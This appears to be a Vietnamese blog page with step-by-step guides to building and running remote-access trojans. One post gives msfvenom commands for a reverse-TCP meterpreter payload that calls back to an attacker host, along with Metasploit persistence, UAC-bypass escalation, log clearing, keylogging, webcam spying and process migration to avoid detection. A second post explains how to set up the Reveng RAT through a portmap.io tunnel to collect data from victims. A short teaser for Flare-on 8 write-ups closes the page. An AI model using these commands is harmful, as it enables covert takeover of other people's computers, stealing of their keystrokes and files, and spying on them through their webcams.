Wednesday 28 August 2019

Tạo trojan bằng msfvenom

1. Tạo trojan

  • msfvenom -a x86 --platform window -f exe -p windows/meterpreter/reverse_tcp lhost=[ip] lport=[port] -o [name].exe

    • -a : nền tảng
    • --platform : hđh
    • -f : định dạng
    • -p : loại payload
    • lhost : host attacker  (tùy trạng thái mà dùng private hay public IP)
    • lport : cổng nhận
    • -o : tên

2. MSF
  • service postgresql start
  • msfconsole : chạy metasploit
  • use exploit/multi/handler
  • set payload [payload]
  • set lhost [IP]
  • set lport [port]
  • exploit

3. Cài Auto Start
  • run persistence -A -U -X -S -i 60 -r [IP] -p [port]
  • -A : tự động kết nối exploit/multi/handler
  • -L : vị trí lưu payload, mặc định là %TEMP%
  • -P : định dạng payload, mặc định windows/meterpreter/reverse_tcp
  • -S : boot like service
  • -U : chạy khi user khởi động
  • -X : chạy khi system khởi động
  • -i : giây giữa những lần thử kết nối
  • -r : IP (attacker)
  • -p : port (attacker)

4. Leo thang đặc quyền (admin)
  • run post/windows/gather/win_privs  :  xem đặc quyền
  • tại "msf >"
  • use exploit/windows/local/bypassuac_injection
  • set session [session]
  • set targets [0 = 32bit]
  • run
Note: Yêu cầu đảm bảo chính xác tương thích về payload, session, x86 hay x64 (cả trojan + victim)

5. Options thông thường
  • exit : thoát hẳn khỏi session
  • background : trở về "msf >" nhưng không thoát session
  • cd, pwd, ls : truy cập, xem đường dẫn, list trên máy victim
  • lcd, lpwd : trên attacker
  • show_mount : thông tin ổ đĩa
  • clearev : xóa log
  • download '[link]'  hoặc   download C:\\Users\\Admin
  • upload
  • edit : xem và sửa ngay trên command
  • execute -f [].exe -H(hide)
  • ps : hiện task
  • shell : chạy cmd.exe
  • keyscan_start : bắt đầu keylogger
  • keyscan_dump : hiện keylog
  • keyscan_stop : dừng
  • screenshot
  • webcam_list
  • webcam_snap : chụp ảnh từ webcam
  • webcam_stream : soi webcam
  • migrate [pid] : cấy vào file exe khác
  • run vnc -i cmd.exe  :  tạo exe và upload cho victim để xem desktop victim, -i : cấy vnc vào exe khác, tránh phát hiện.

6. Dùng portmap.io để điều khiển qua WAN

Tuesday 27 August 2019

Sử dụng Reveng RAT v0.3.

1. SET UP
  • Tạo VPN để nhận dữ liệu từ victim và gửi về attacker.
    • portmap.io  =>  Tạo VPN







    • Tải OpenVPN để nhận dữ liệu
      • Import .ovpn vừa tải ở trên
      • Connect 


2. TẠO RAT

  • Run as admin

  • Client Builder  =>  Network (host và port của vpn để gửi dữ liệu)  =>  Basic  =>  Install  =>  Startup  =>  Icon  =>  Module  =>  Compile

  • Đây là RAT chạy trên victim

3. TRACKING
  • Cũng Run tương tự như trên nhưng chỉ cần chờ ở Clients.

Flare-on 8

               List: 01 - credchecker 02 - known 03 - antioch 04 - myaquaticlife   01 - credchecker 01_credchecker.7z Đây là một bài ...